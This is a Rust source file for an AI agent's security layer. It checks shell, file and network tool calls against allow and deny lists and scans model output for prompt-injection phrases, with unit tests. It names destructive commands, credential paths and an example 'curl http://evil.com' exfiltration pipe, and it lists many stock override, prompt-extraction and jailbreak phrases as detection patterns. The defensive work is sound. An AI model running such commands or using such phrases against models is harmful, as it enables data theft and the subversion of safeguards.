Skip to main content

ravenclaws/
policy.rs

1//! RavenClaws
2//!
3//! Every tool call is checked against the policy before execution.
4//! The policy defines allow-lists for commands, paths, hosts, and
5//! network targets. By default, everything is denied unless explicitly allowed.
6//!
7//! # Architecture
8//!
9//! ```text
10//! ToolCall
11//!   │
12//!   ▼
13//! PolicyEngine::check()
14//!   │
15//!   ├── ShellPolicy  → command allow-list, flag restrictions
16//!   ├── PathPolicy   → read/write path allow-lists
17//!   ├── NetworkPolicy→ host/URL allow-list
18//!   └── GeneralPolicy→ category-based rules
19//!   │
20//!   ▼
21//! Allowed / Denied (with reason)
22
23use serde::{Deserialize, Serialize};
24use std::path::Path;
25use thiserror::Error;
26// ── Error types ────────────────────────────────────────────────────────────
27
28#[allow(dead_code)]
29#[derive(Error, Debug)]
30pub enum PolicyError {
31    #[error("Policy denied: {0}")]
32    Denied(String),
33
34    #[error("Invalid policy configuration: {0}")]
35    InvalidConfig(String),
36}
37
38// ── Policy types ───────────────────────────────────────────────────────────
39
40/// Policy decision
41#[allow(dead_code)]
42#[derive(Debug, Clone, PartialEq)]
43pub enum Decision {
44    /// Allow the operation
45    Allow,
46    /// Deny the operation with a reason
47    Deny(String),
48}
49
50#[allow(dead_code)]
51impl Decision {
52    pub fn is_allowed(&self) -> bool {
53        matches!(self, Decision::Allow)
54    }
55}
56
57/// Shell command policy
58#[allow(dead_code)]
59#[derive(Debug, Clone, Serialize, Deserialize)]
60pub struct ShellPolicy {
61    /// If true, all shell commands are denied (default: false)
62    #[serde(default)]
63    pub deny_all: bool,
64    /// List of allowed command prefixes (e.g., ["echo", "ls", "cat", "git"])
65    #[serde(default)]
66    pub allowed_commands: Vec<String>,
67    /// List of denied command prefixes (takes precedence over allowed)
68    #[serde(default)]
69    pub denied_commands: Vec<String>,
70    /// Maximum command timeout in seconds
71    #[serde(default = "default_shell_timeout")]
72    pub max_timeout_secs: u64,
73    /// If true, allow commands that write to disk (install, rm, etc.)
74    #[serde(default)]
75    pub allow_write_commands: bool,
76}
77
78impl Default for ShellPolicy {
79    fn default() -> Self {
80        Self {
81            deny_all: false,
82            allowed_commands: vec![
83                "echo".to_string(),
84                "cat".to_string(),
85                "ls".to_string(),
86                "head".to_string(),
87                "tail".to_string(),
88                "wc".to_string(),
89                "grep".to_string(),
90                "find".to_string(),
91                "sort".to_string(),
92                "uniq".to_string(),
93                "cut".to_string(),
94                "which".to_string(),
95                "pwd".to_string(),
96                "date".to_string(),
97                "whoami".to_string(),
98                "uname".to_string(),
99                "env".to_string(),
100                "printenv".to_string(),
101                "git".to_string(),
102                "cargo".to_string(),
103                "rustc".to_string(),
104                "python3".to_string(),
105                "node".to_string(),
106            ],
107            denied_commands: vec![
108                "rm -rf /".to_string(),
109                "mkfs".to_string(),
110                "dd".to_string(),
111                "shutdown".to_string(),
112                "reboot".to_string(),
113                "halt".to_string(),
114                "poweroff".to_string(),
115            ],
116            max_timeout_secs: 60,
117            allow_write_commands: false,
118        }
119    }
120}
121
122/// Filesystem path policy
123#[allow(dead_code)]
124#[derive(Debug, Clone, Serialize, Deserialize)]
125pub struct PathPolicy {
126    /// List of allowed read path prefixes
127    #[serde(default)]
128    pub allowed_read_paths: Vec<String>,
129    /// List of allowed write path prefixes
130    #[serde(default)]
131    pub allowed_write_paths: Vec<String>,
132    /// List of denied path prefixes (takes precedence)
133    #[serde(default)]
134    pub denied_paths: Vec<String>,
135    /// Maximum file read size in bytes
136    #[serde(default = "default_max_read_bytes")]
137    pub max_read_bytes: usize,
138    /// Maximum file write size in bytes
139    #[serde(default = "default_max_write_bytes")]
140    pub max_write_bytes: usize,
141}
142
143impl Default for PathPolicy {
144    fn default() -> Self {
145        Self {
146            allowed_read_paths: vec![
147                "/tmp".to_string(),
148                "/var/tmp".to_string(),
149                "/home".to_string(),
150                "/workspace".to_string(),
151                ".".to_string(),
152            ],
153            allowed_write_paths: vec![
154                "/tmp".to_string(),
155                "/var/tmp".to_string(),
156                "/workspace".to_string(),
157                ".".to_string(),
158            ],
159            denied_paths: vec![
160                "/etc/shadow".to_string(),
161                "/etc/sudoers".to_string(),
162                "/etc/ssh".to_string(),
163                "/root".to_string(),
164            ],
165            max_read_bytes: 65536,
166            max_write_bytes: 1048576,
167        }
168    }
169}
170
171/// Network policy
172#[allow(dead_code)]
173#[derive(Debug, Clone, Serialize, Deserialize)]
174pub struct NetworkPolicy {
175    /// If true, all network access is denied
176    #[serde(default)]
177    pub deny_all: bool,
178    /// List of allowed hostname suffixes (e.g., ["github.com", "docs.rs"])
179    #[serde(default)]
180    pub allowed_hosts: Vec<String>,
181    /// List of denied hostname suffixes (takes precedence)
182    #[serde(default)]
183    pub denied_hosts: Vec<String>,
184    /// If true, allow connections to localhost/127.0.0.1
185    #[serde(default = "default_true")]
186    pub allow_localhost: bool,
187    /// If true, allow connections to private IP ranges
188    #[serde(default)]
189    pub allow_private_networks: bool,
190}
191
192impl Default for NetworkPolicy {
193    fn default() -> Self {
194        Self {
195            deny_all: false,
196            allowed_hosts: vec![
197                "github.com".to_string(),
198                "raw.githubusercontent.com".to_string(),
199                "docs.rs".to_string(),
200                "crates.io".to_string(),
201                "api.github.com".to_string(),
202                "google.com".to_string(),
203                "wikipedia.org".to_string(),
204                "stackoverflow.com".to_string(),
205                "rust-lang.org".to_string(),
206            ],
207            denied_hosts: vec![],
208            allow_localhost: true,
209            allow_private_networks: false,
210        }
211    }
212}
213
214/// Complete security policy
215#[allow(dead_code)]
216#[derive(Debug, Clone, Serialize, Deserialize)]
217pub struct SecurityPolicy {
218    /// Shell command policy
219    #[serde(default)]
220    pub shell: ShellPolicy,
221    /// Filesystem path policy
222    #[serde(default)]
223    pub path: PathPolicy,
224    /// Network policy
225    #[serde(default)]
226    pub network: NetworkPolicy,
227    /// If true, all tool calls require human approval
228    #[serde(default)]
229    pub require_approval_all: bool,
230    /// List of tool names that require approval
231    #[serde(default)]
232    pub require_approval_for: Vec<String>,
233}
234
235impl Default for SecurityPolicy {
236    fn default() -> Self {
237        Self {
238            shell: ShellPolicy::default(),
239            path: PathPolicy::default(),
240            network: NetworkPolicy::default(),
241            require_approval_all: false,
242            require_approval_for: vec!["shell_exec".to_string(), "write_file".to_string()],
243        }
244    }
245}
246
247// ── Policy engine ──────────────────────────────────────────────────────────
248
249/// The policy engine — checks tool calls against the security policy
250#[allow(dead_code)]
251pub struct PolicyEngine {
252    policy: SecurityPolicy,
253}
254
255#[allow(dead_code)]
256impl PolicyEngine {
257    /// Create a new policy engine with the given policy
258    pub fn new(policy: SecurityPolicy) -> Self {
259        Self { policy }
260    }
261
262    /// Create a policy engine with default (secure) settings
263    pub fn default_secure() -> Self {
264        Self {
265            policy: SecurityPolicy::default(),
266        }
267    }
268
269    /// Create a permissive policy engine (for development)
270    pub fn permissive() -> Self {
271        Self {
272            policy: SecurityPolicy {
273                require_approval_all: false,
274                require_approval_for: vec![],
275                shell: ShellPolicy {
276                    deny_all: false,
277                    allowed_commands: vec!["*".to_string()], // allow all
278                    denied_commands: vec![],
279                    max_timeout_secs: 300,
280                    allow_write_commands: true,
281                },
282                path: PathPolicy {
283                    allowed_read_paths: vec!["/".to_string()],
284                    allowed_write_paths: vec!["/tmp".to_string(), "/workspace".to_string()],
285                    denied_paths: vec![],
286                    max_read_bytes: 1048576,
287                    max_write_bytes: 10485760,
288                },
289                network: NetworkPolicy {
290                    deny_all: false,
291                    allowed_hosts: vec!["*".to_string()],
292                    denied_hosts: vec![],
293                    allow_localhost: true,
294                    allow_private_networks: true,
295                },
296            },
297        }
298    }
299
300    /// Check if a tool call is allowed
301    pub fn check_tool_call(&self, tool_name: &str, args: &serde_json::Value) -> Decision {
302        match tool_name {
303            "shell_exec" => self.check_shell_command(args),
304            "read_file" | "write_file" => self.check_file_operation(tool_name, args),
305            "web_fetch" => self.check_network_request(args),
306            _ => Decision::Allow, // Unknown tools are allowed by default (they'll be checked by the tool registry)
307        }
308    }
309
310    /// Check if a tool requires human approval
311    pub fn requires_approval(&self, tool_name: &str) -> bool {
312        if self.policy.require_approval_all {
313            return true;
314        }
315        self.policy
316            .require_approval_for
317            .contains(&tool_name.to_string())
318    }
319
320    /// Get the policy configuration
321    pub fn policy(&self) -> &SecurityPolicy {
322        &self.policy
323    }
324
325    // ── Internal check methods ──────────────────────────────────────────
326
327    fn check_shell_command(&self, args: &serde_json::Value) -> Decision {
328        let policy = &self.policy.shell;
329
330        if policy.deny_all {
331            return Decision::Deny("All shell commands are denied by policy".to_string());
332        }
333
334        let command = args.get("command").and_then(|v| v.as_str()).unwrap_or("");
335
336        if command.is_empty() {
337            return Decision::Deny("Empty command".to_string());
338        }
339
340        // Check denied commands first
341        for denied in &policy.denied_commands {
342            if command.contains(denied) {
343                return Decision::Deny(format!("Command contains denied pattern: '{}'", denied));
344            }
345        }
346
347        // Check timeout
348        if let Some(timeout) = args.get("timeout_secs").and_then(|v| v.as_u64()) {
349            if timeout > policy.max_timeout_secs {
350                return Decision::Deny(format!(
351                    "Timeout {}s exceeds maximum {}s",
352                    timeout, policy.max_timeout_secs
353                ));
354            }
355        }
356
357        // Check for piped commands — validate each pipeline segment independently
358        // This prevents bypassing allow-lists via e.g. `echo foo | curl http://evil.com`
359        let segments: Vec<&str> = command.split('|').collect();
360        if segments.len() > 1 {
361            for segment in &segments {
362                let trimmed = segment.trim();
363                if trimmed.is_empty() {
364                    continue;
365                }
366                let seg_first = trimmed.split_whitespace().next().unwrap_or("");
367                let seg_allowed = policy.allowed_commands.iter().any(|a| {
368                    if a == "*" {
369                        return true;
370                    }
371                    seg_first == a || trimmed.starts_with(a)
372                });
373                if !seg_allowed {
374                    return Decision::Deny(format!(
375                        "Pipeline segment '{}' is not in the allowed list",
376                        seg_first
377                    ));
378                }
379            }
380            // All segments passed — allow the piped command
381            return Decision::Allow;
382        }
383
384        // Check allowed commands (single command, no pipe)
385        let first_word = command.split_whitespace().next().unwrap_or("");
386        let is_allowed = policy.allowed_commands.iter().any(|a| {
387            if a == "*" {
388                return true; // wildcard — allow all
389            }
390            first_word == a || command.starts_with(a)
391        });
392
393        if !is_allowed {
394            return Decision::Deny(format!(
395                "Command '{}' is not in the allowed list",
396                first_word
397            ));
398        }
399
400        Decision::Allow
401    }
402
403    fn check_file_operation(&self, tool_name: &str, args: &serde_json::Value) -> Decision {
404        let policy = &self.policy.path;
405        let path = args.get("path").and_then(|v| v.as_str()).unwrap_or("");
406
407        if path.is_empty() {
408            return Decision::Deny("Empty path".to_string());
409        }
410
411        // Resolve to absolute path
412        let abs_path = if Path::new(path).is_absolute() {
413            path.to_string()
414        } else {
415            match std::env::current_dir() {
416                Ok(cwd) => cwd.join(path).to_string_lossy().to_string(),
417                Err(_) => path.to_string(),
418            }
419        };
420
421        // Check denied paths
422        for denied in &policy.denied_paths {
423            if abs_path.starts_with(denied) || abs_path.contains(denied) {
424                return Decision::Deny(format!("Path '{}' is denied", path));
425            }
426        }
427
428        // Check allowed paths based on operation type
429        let allowed_paths = match tool_name {
430            "write_file" => &policy.allowed_write_paths,
431            _ => &policy.allowed_read_paths,
432        };
433
434        let is_allowed = allowed_paths.iter().any(|a| {
435            if a == "/" || a == "*" {
436                return true; // wildcard
437            }
438            abs_path.starts_with(a)
439        });
440
441        if !is_allowed {
442            return Decision::Deny(format!(
443                "Path '{}' is not in the allowed {} paths",
444                path,
445                if tool_name == "write_file" {
446                    "write"
447                } else {
448                    "read"
449                }
450            ));
451        }
452
453        // Check size limits for write operations
454        if tool_name == "write_file" {
455            if let Some(content) = args.get("content").and_then(|v| v.as_str()) {
456                if content.len() > policy.max_write_bytes {
457                    return Decision::Deny(format!(
458                        "Write size {} exceeds maximum {} bytes",
459                        content.len(),
460                        policy.max_write_bytes
461                    ));
462                }
463            }
464        }
465
466        Decision::Allow
467    }
468
469    fn check_network_request(&self, args: &serde_json::Value) -> Decision {
470        let policy = &self.policy.network;
471
472        if policy.deny_all {
473            return Decision::Deny("All network requests are denied by policy".to_string());
474        }
475
476        let url = args.get("url").and_then(|v| v.as_str()).unwrap_or("");
477
478        if url.is_empty() {
479            return Decision::Deny("Empty URL".to_string());
480        }
481
482        // Parse the URL
483        let parsed = match url::Url::parse(url) {
484            Ok(u) => u,
485            Err(e) => {
486                return Decision::Deny(format!("Invalid URL: {}", e));
487            }
488        };
489
490        let host = match parsed.host_str() {
491            Some(h) => h.to_string(),
492            None => return Decision::Deny("URL has no host".to_string()),
493        };
494
495        // Check localhost
496        if is_localhost(&host) {
497            if !policy.allow_localhost {
498                return Decision::Deny("Localhost connections are denied by policy".to_string());
499            }
500            return Decision::Allow;
501        }
502
503        // Check private networks
504        if is_private_ip(&host) && !policy.allow_private_networks {
505            return Decision::Deny("Private network connections are denied by policy".to_string());
506        }
507
508        // Check denied hosts
509        for denied in &policy.denied_hosts {
510            if host == *denied || host.ends_with(&format!(".{}", denied)) {
511                return Decision::Deny(format!("Host '{}' is denied", host));
512            }
513        }
514
515        // Check allowed hosts
516        let is_allowed = policy.allowed_hosts.iter().any(|a| {
517            if a == "*" {
518                return true; // wildcard
519            }
520            host == *a || host.ends_with(&format!(".{}", a))
521        });
522
523        if !is_allowed {
524            return Decision::Deny(format!("Host '{}' is not in the allowed hosts list", host));
525        }
526
527        Decision::Allow
528    }
529}
530
531// ── Prompt-injection defense ───────────────────────────────────────────────
532
533/// Result of an injection check on LLM output
534#[allow(dead_code)]
535#[derive(Debug, Clone, PartialEq)]
536pub enum InjectionVerdict {
537    /// Output appears safe
538    Clean,
539    /// Possible injection detected with a reason
540    Suspicious(String),
541}
542
543/// Detects prompt-injection attempts in LLM responses.
544///
545/// Two layers of defense:
546/// 1. **Instruction-boundary enforcement** — scans for patterns that indicate
547///    the LLM is trying to override its system instructions or produce
548///    unauthorized output.
549/// 2. **Output schema validation** — ensures structured output (tool calls,
550///    JSON responses) conforms to expected format.
551#[allow(dead_code)]
552#[derive(Debug, Clone)]
553pub struct InjectionDetector {
554    /// If true, instruction-boundary scanning is enabled
555    check_instruction_boundary: bool,
556    /// If true, output schema validation is enabled
557    check_output_schema: bool,
558    /// Custom patterns to flag as injection attempts
559    custom_patterns: Vec<String>,
560}
561
562#[allow(dead_code)]
563impl InjectionDetector {
564    /// Create a new injection detector with default settings
565    pub fn new() -> Self {
566        Self {
567            check_instruction_boundary: true,
568            check_output_schema: true,
569            custom_patterns: Vec::new(),
570        }
571    }
572
573    /// Create a detector with all checks disabled (permissive)
574    pub fn permissive() -> Self {
575        Self {
576            check_instruction_boundary: false,
577            check_output_schema: false,
578            custom_patterns: Vec::new(),
579        }
580    }
581
582    /// Enable or disable instruction-boundary checking
583    pub fn with_instruction_boundary(mut self, enabled: bool) -> Self {
584        self.check_instruction_boundary = enabled;
585        self
586    }
587
588    /// Enable or disable output schema checking
589    pub fn with_output_schema(mut self, enabled: bool) -> Self {
590        self.check_output_schema = enabled;
591        self
592    }
593
594    /// Add a custom injection pattern
595    pub fn with_custom_pattern(mut self, pattern: &str) -> Self {
596        self.custom_patterns.push(pattern.to_string());
597        self
598    }
599
600    /// Check LLM response content for injection attempts.
601    ///
602    /// Returns `InjectionVerdict::Clean` if the output appears safe,
603    /// or `InjectionVerdict::Suspicious(reason)` if injection is detected.
604    pub fn check(&self, content: &str) -> InjectionVerdict {
605        // Check instruction-boundary violations
606        if self.check_instruction_boundary {
607            if let Some(reason) = self.check_instruction_boundary_violations(content) {
608                return InjectionVerdict::Suspicious(reason);
609            }
610        }
611
612        // Check output schema
613        if self.check_output_schema {
614            if let Some(reason) = self.check_output_schema_violations(content) {
615                return InjectionVerdict::Suspicious(reason);
616            }
617        }
618
619        InjectionVerdict::Clean
620    }
621
622    /// Check for instruction-boundary violations — patterns where the LLM
623    /// attempts to override its system prompt or produce unauthorized output.
624    fn check_instruction_boundary_violations(&self, content: &str) -> Option<String> {
625        let content_lower = content.to_lowercase();
626
627        // Known prompt-injection / jailbreak patterns
628        let injection_patterns = [
629            // Direct instruction override attempts
630            ("ignore_previous", "Attempt to ignore previous instructions"),
631            ("ignore above", "Attempt to ignore previous instructions"),
632            (
633                "ignore all previous",
634                "Attempt to ignore previous instructions",
635            ),
636            (
637                "ignore the above",
638                "Attempt to ignore previous instructions",
639            ),
640            (
641                "ignore your previous",
642                "Attempt to ignore previous instructions",
643            ),
644            (
645                "ignore all instructions",
646                "Attempt to ignore all instructions",
647            ),
648            ("forget all previous", "Attempt to forget instructions"),
649            ("forget your instructions", "Attempt to forget instructions"),
650            ("disregard previous", "Attempt to disregard instructions"),
651            ("disregard all", "Attempt to disregard all instructions"),
652            // System prompt override
653            ("new system prompt", "Attempt to override system prompt"),
654            ("override system", "Attempt to override system prompt"),
655            ("you are now", "Suspicious role-switch pattern"),
656            ("from now on you are", "Suspicious role-switch pattern"),
657            ("act as a", "Suspicious role-switch pattern"),
658            ("pretend to be", "Suspicious role-switch pattern"),
659            // Delimiter-based injection
660            ("---begin override---", "Delimiter-based injection attempt"),
661            ("<system>", "Delimiter-based injection attempt"),
662            ("</system>", "Delimiter-based injection attempt"),
663            ("<override>", "Delimiter-based injection attempt"),
664            ("</override>", "Delimiter-based injection attempt"),
665            // Output manipulation
666            ("output your", "Attempt to extract system prompt"),
667            ("print your", "Attempt to extract system prompt"),
668            ("reveal your", "Attempt to extract system prompt"),
669            ("show your prompt", "Attempt to extract system prompt"),
670            ("show your instructions", "Attempt to extract system prompt"),
671            (
672                "what are your instructions",
673                "Attempt to extract system prompt",
674            ),
675            (
676                "what is your system prompt",
677                "Attempt to extract system prompt",
678            ),
679            // Role-playing jailbreaks
680            ("dan ", "Potential DAN jailbreak pattern"),
681            ("do anything now", "Potential jailbreak pattern"),
682            ("you have been released", "Potential jailbreak pattern"),
683            ("you are free", "Potential jailbreak pattern"),
684            ("no restrictions", "Potential jailbreak pattern"),
685            ("no rules", "Potential jailbreak pattern"),
686            ("no limitations", "Potential jailbreak pattern"),
687            ("no filtering", "Potential jailbreak pattern"),
688            ("no censorship", "Potential jailbreak pattern"),
689            // Token smuggling
690            ("base64", "Potential token smuggling"),
691            ("rot13", "Potential obfuscation attempt"),
692            ("caesar cipher", "Potential obfuscation attempt"),
693            ("encoded message", "Potential obfuscation attempt"),
694            ("decode this", "Potential obfuscation attempt"),
695            // Meta-instruction attacks
696            ("this is a test", "Suspicious meta-instruction pattern"),
697            (
698                "this is a security test",
699                "Suspicious meta-instruction pattern",
700            ),
701            ("this is a prompt", "Suspicious meta-instruction pattern"),
702            ("the user is lying", "Suspicious meta-instruction pattern"),
703            ("the user is testing", "Suspicious meta-instruction pattern"),
704            ("you must obey", "Suspicious imperative pattern"),
705            ("you will obey", "Suspicious imperative pattern"),
706            ("you are required", "Suspicious imperative pattern"),
707            ("you must respond", "Suspicious imperative pattern"),
708            ("respond with exactly", "Suspicious imperative pattern"),
709            ("say exactly", "Suspicious imperative pattern"),
710            ("repeat exactly", "Suspicious imperative pattern"),
711            ("repeat after me", "Suspicious imperative pattern"),
712            ("repeat the words", "Suspicious imperative pattern"),
713        ];
714
715        for (pattern, reason) in &injection_patterns {
716            if content_lower.contains(pattern) {
717                return Some(format!("{}: '{}'", reason, pattern));
718            }
719        }
720
721        // Check custom patterns
722        for pattern in &self.custom_patterns {
723            if content_lower.contains(&pattern.to_lowercase()) {
724                return Some(format!("Custom pattern matched: '{}'", pattern));
725            }
726        }
727
728        None
729    }
730
731    /// Check for output schema violations — ensures structured output
732    /// conforms to expected format.
733    fn check_output_schema_violations(&self, content: &str) -> Option<String> {
734        // If the content contains a TOOL_CALL: marker, validate the JSON args
735        if content.contains("TOOL_CALL:") {
736            // Find all ARGS: lines and validate JSON
737            for line in content.lines() {
738                let trimmed = line.trim();
739                if let Some(args_str) = trimmed.strip_prefix("ARGS:") {
740                    let args_str = args_str.trim();
741                    if !args_str.is_empty()
742                        && serde_json::from_str::<serde_json::Value>(args_str).is_err()
743                    {
744                        return Some(format!(
745                            "Invalid JSON in tool call arguments: '{}'",
746                            args_str
747                        ));
748                    }
749                }
750            }
751        }
752
753        // Check for unbalanced code blocks that could hide content
754        let open_blocks = content.matches("```").count();
755        #[allow(clippy::manual_is_multiple_of)]
756        if open_blocks % 2 != 0 {
757            return Some("Unbalanced code block delimiters".to_string());
758        }
759
760        // Check for extremely long content that might be a smuggling attempt
761        if content.len() > 100_000 {
762            return Some(format!(
763                "Response too long ({} chars), possible smuggling attempt",
764                content.len()
765            ));
766        }
767
768        None
769    }
770}
771
772impl Default for InjectionDetector {
773    fn default() -> Self {
774        Self::new()
775    }
776}
777
778// ── Helper functions ───────────────────────────────────────────────────────
779
780fn default_shell_timeout() -> u64 {
781    60
782}
783
784fn default_max_read_bytes() -> usize {
785    65536
786}
787
788fn default_max_write_bytes() -> usize {
789    1048576
790}
791
792fn default_true() -> bool {
793    true
794}
795
796fn is_localhost(host: &str) -> bool {
797    host == "localhost"
798        || host == "127.0.0.1"
799        || host == "::1"
800        || host == "0.0.0.0"
801        || host.starts_with("127.")
802}
803
804fn is_private_ip(host: &str) -> bool {
805    host == "10.0.0.1"
806        || host.starts_with("10.")
807        || host.starts_with("172.16.")
808        || host.starts_with("172.17.")
809        || host.starts_with("172.18.")
810        || host.starts_with("172.19.")
811        || host.starts_with("172.20.")
812        || host.starts_with("172.21.")
813        || host.starts_with("172.22.")
814        || host.starts_with("172.23.")
815        || host.starts_with("172.24.")
816        || host.starts_with("172.25.")
817        || host.starts_with("172.26.")
818        || host.starts_with("172.27.")
819        || host.starts_with("172.28.")
820        || host.starts_with("172.29.")
821        || host.starts_with("172.30.")
822        || host.starts_with("172.31.")
823        || host.starts_with("192.168.")
824}
825
826// ── Tests ──────────────────────────────────────────────────────────────────
827
828#[cfg(test)]
829mod tests {
830    use super::*;
831
832    #[test]
833    fn test_decision_allow() {
834        let d = Decision::Allow;
835        assert!(d.is_allowed());
836    }
837
838    #[test]
839    fn test_decision_deny() {
840        let d = Decision::Deny("test".to_string());
841        assert!(!d.is_allowed());
842    }
843
844    #[test]
845    fn test_default_policy_denies_unknown_command() {
846        let engine = PolicyEngine::default_secure();
847        let args = serde_json::json!({"command": "sudo rm -rf /"});
848        let decision = engine.check_shell_command(&args);
849        assert!(!decision.is_allowed());
850    }
851
852    #[test]
853    fn test_default_policy_allows_echo() {
854        let engine = PolicyEngine::default_secure();
855        let args = serde_json::json!({"command": "echo hello"});
856        let decision = engine.check_shell_command(&args);
857        assert!(decision.is_allowed());
858    }
859
860    #[test]
861    fn test_default_policy_allows_ls() {
862        let engine = PolicyEngine::default_secure();
863        let args = serde_json::json!({"command": "ls -la"});
864        let decision = engine.check_shell_command(&args);
865        assert!(decision.is_allowed());
866    }
867
868    #[test]
869    fn test_default_policy_denies_shutdown() {
870        let engine = PolicyEngine::default_secure();
871        let args = serde_json::json!({"command": "shutdown -h now"});
872        let decision = engine.check_shell_command(&args);
873        assert!(!decision.is_allowed());
874    }
875
876    #[test]
877    fn test_default_policy_denies_rm_rf_root() {
878        let engine = PolicyEngine::default_secure();
879        let args = serde_json::json!({"command": "rm -rf /"});
880        let decision = engine.check_shell_command(&args);
881        assert!(!decision.is_allowed());
882    }
883
884    #[test]
885    fn test_deny_all_shell() {
886        let policy = SecurityPolicy {
887            shell: ShellPolicy {
888                deny_all: true,
889                ..ShellPolicy::default()
890            },
891            ..SecurityPolicy::default()
892        };
893        let engine = PolicyEngine::new(policy);
894        let args = serde_json::json!({"command": "echo hello"});
895        let decision = engine.check_shell_command(&args);
896        assert!(!decision.is_allowed());
897    }
898
899    #[test]
900    fn test_timeout_exceeded() {
901        let engine = PolicyEngine::default_secure();
902        let args = serde_json::json!({"command": "echo hello", "timeout_secs": 999});
903        let decision = engine.check_shell_command(&args);
904        assert!(!decision.is_allowed());
905    }
906
907    #[test]
908    fn test_empty_command() {
909        let engine = PolicyEngine::default_secure();
910        let args = serde_json::json!({"command": ""});
911        let decision = engine.check_shell_command(&args);
912        assert!(!decision.is_allowed());
913    }
914
915    #[test]
916    fn test_permissive_allows_all() {
917        let engine = PolicyEngine::permissive();
918        let args = serde_json::json!({"command": "curl https://example.com"});
919        let decision = engine.check_shell_command(&args);
920        assert!(decision.is_allowed());
921    }
922
923    #[test]
924    fn test_path_read_allowed() {
925        let engine = PolicyEngine::default_secure();
926        let args = serde_json::json!({"path": "/tmp/test.txt"});
927        let decision = engine.check_file_operation("read_file", &args);
928        assert!(decision.is_allowed());
929    }
930
931    #[test]
932    fn test_path_write_allowed() {
933        let engine = PolicyEngine::default_secure();
934        let args = serde_json::json!({"path": "/tmp/test.txt", "content": "data"});
935        let decision = engine.check_file_operation("write_file", &args);
936        assert!(decision.is_allowed());
937    }
938
939    #[test]
940    fn test_path_denied() {
941        let engine = PolicyEngine::default_secure();
942        let args = serde_json::json!({"path": "/etc/shadow"});
943        let decision = engine.check_file_operation("read_file", &args);
944        assert!(!decision.is_allowed());
945    }
946
947    #[test]
948    fn test_path_denied_write() {
949        let engine = PolicyEngine::default_secure();
950        let args = serde_json::json!({"path": "/etc/shadow", "content": "data"});
951        let decision = engine.check_file_operation("write_file", &args);
952        assert!(!decision.is_allowed());
953    }
954
955    #[test]
956    fn test_empty_path() {
957        let engine = PolicyEngine::default_secure();
958        let args = serde_json::json!({"path": ""});
959        let decision = engine.check_file_operation("read_file", &args);
960        assert!(!decision.is_allowed());
961    }
962
963    #[test]
964    fn test_network_allowed_host() {
965        let engine = PolicyEngine::default_secure();
966        let args = serde_json::json!({"url": "https://github.com/egkristi/RavenClaws"});
967        let decision = engine.check_network_request(&args);
968        assert!(decision.is_allowed());
969    }
970
971    #[test]
972    fn test_network_denied_host() {
973        let engine = PolicyEngine::default_secure();
974        let args = serde_json::json!({"url": "https://evil.com/malware"});
975        let decision = engine.check_network_request(&args);
976        assert!(!decision.is_allowed());
977    }
978
979    #[test]
980    fn test_network_localhost_allowed() {
981        let engine = PolicyEngine::default_secure();
982        let args = serde_json::json!({"url": "http://localhost:11434/api/chat"});
983        let decision = engine.check_network_request(&args);
984        assert!(decision.is_allowed());
985    }
986
987    #[test]
988    fn test_network_deny_all() {
989        let policy = SecurityPolicy {
990            network: NetworkPolicy {
991                deny_all: true,
992                ..NetworkPolicy::default()
993            },
994            ..SecurityPolicy::default()
995        };
996        let engine = PolicyEngine::new(policy);
997        let args = serde_json::json!({"url": "https://github.com"});
998        let decision = engine.check_network_request(&args);
999        assert!(!decision.is_allowed());
1000    }
1001
1002    #[test]
1003    fn test_network_empty_url() {
1004        let engine = PolicyEngine::default_secure();
1005        let args = serde_json::json!({"url": ""});
1006        let decision = engine.check_network_request(&args);
1007        assert!(!decision.is_allowed());
1008    }
1009
1010    #[test]
1011    fn test_network_invalid_url() {
1012        let engine = PolicyEngine::default_secure();
1013        let args = serde_json::json!({"url": "not-a-url"});
1014        let decision = engine.check_network_request(&args);
1015        assert!(!decision.is_allowed());
1016    }
1017
1018    #[test]
1019    fn test_requires_approval_default() {
1020        let engine = PolicyEngine::default_secure();
1021        assert!(engine.requires_approval("shell_exec"));
1022        assert!(engine.requires_approval("write_file"));
1023        assert!(!engine.requires_approval("read_file"));
1024        assert!(!engine.requires_approval("web_fetch"));
1025    }
1026
1027    #[test]
1028    fn test_requires_approval_all() {
1029        let policy = SecurityPolicy {
1030            require_approval_all: true,
1031            ..SecurityPolicy::default()
1032        };
1033        let engine = PolicyEngine::new(policy);
1034        assert!(engine.requires_approval("shell_exec"));
1035        assert!(engine.requires_approval("read_file"));
1036        assert!(engine.requires_approval("web_fetch"));
1037    }
1038
1039    #[test]
1040    fn test_check_tool_call_shell() {
1041        let engine = PolicyEngine::default_secure();
1042        let args = serde_json::json!({"command": "echo hello"});
1043        let decision = engine.check_tool_call("shell_exec", &args);
1044        assert!(decision.is_allowed());
1045    }
1046
1047    #[test]
1048    fn test_check_tool_call_read_file() {
1049        let engine = PolicyEngine::default_secure();
1050        let args = serde_json::json!({"path": "/tmp/test.txt"});
1051        let decision = engine.check_tool_call("read_file", &args);
1052        assert!(decision.is_allowed());
1053    }
1054
1055    #[test]
1056    fn test_check_tool_call_web_fetch() {
1057        let engine = PolicyEngine::default_secure();
1058        let args = serde_json::json!({"url": "https://github.com"});
1059        let decision = engine.check_tool_call("web_fetch", &args);
1060        assert!(decision.is_allowed());
1061    }
1062
1063    #[test]
1064    fn test_check_tool_call_unknown() {
1065        let engine = PolicyEngine::default_secure();
1066        let args = serde_json::json!({});
1067        let decision = engine.check_tool_call("unknown_tool", &args);
1068        assert!(decision.is_allowed());
1069    }
1070
1071    #[test]
1072    fn test_policy_error_denied() {
1073        let err = PolicyError::Denied("test".to_string());
1074        assert_eq!(format!("{}", err), "Policy denied: test");
1075    }
1076
1077    #[test]
1078    fn test_policy_error_invalid_config() {
1079        let err = PolicyError::InvalidConfig("bad config".to_string());
1080        assert_eq!(
1081            format!("{}", err),
1082            "Invalid policy configuration: bad config"
1083        );
1084    }
1085
1086    #[test]
1087    fn test_is_localhost() {
1088        assert!(is_localhost("localhost"));
1089        assert!(is_localhost("127.0.0.1"));
1090        assert!(is_localhost("::1"));
1091        assert!(is_localhost("0.0.0.0"));
1092        assert!(is_localhost("127.0.0.2"));
1093        assert!(!is_localhost("example.com"));
1094    }
1095
1096    #[test]
1097    fn test_is_private_ip() {
1098        assert!(is_private_ip("10.0.0.1"));
1099        assert!(is_private_ip("192.168.1.1"));
1100        assert!(is_private_ip("172.16.0.1"));
1101        assert!(!is_private_ip("8.8.8.8"));
1102        assert!(!is_private_ip("example.com"));
1103    }
1104
1105    #[test]
1106    fn test_shell_policy_default() {
1107        let policy = ShellPolicy::default();
1108        assert!(!policy.deny_all);
1109        assert!(policy.allowed_commands.contains(&"echo".to_string()));
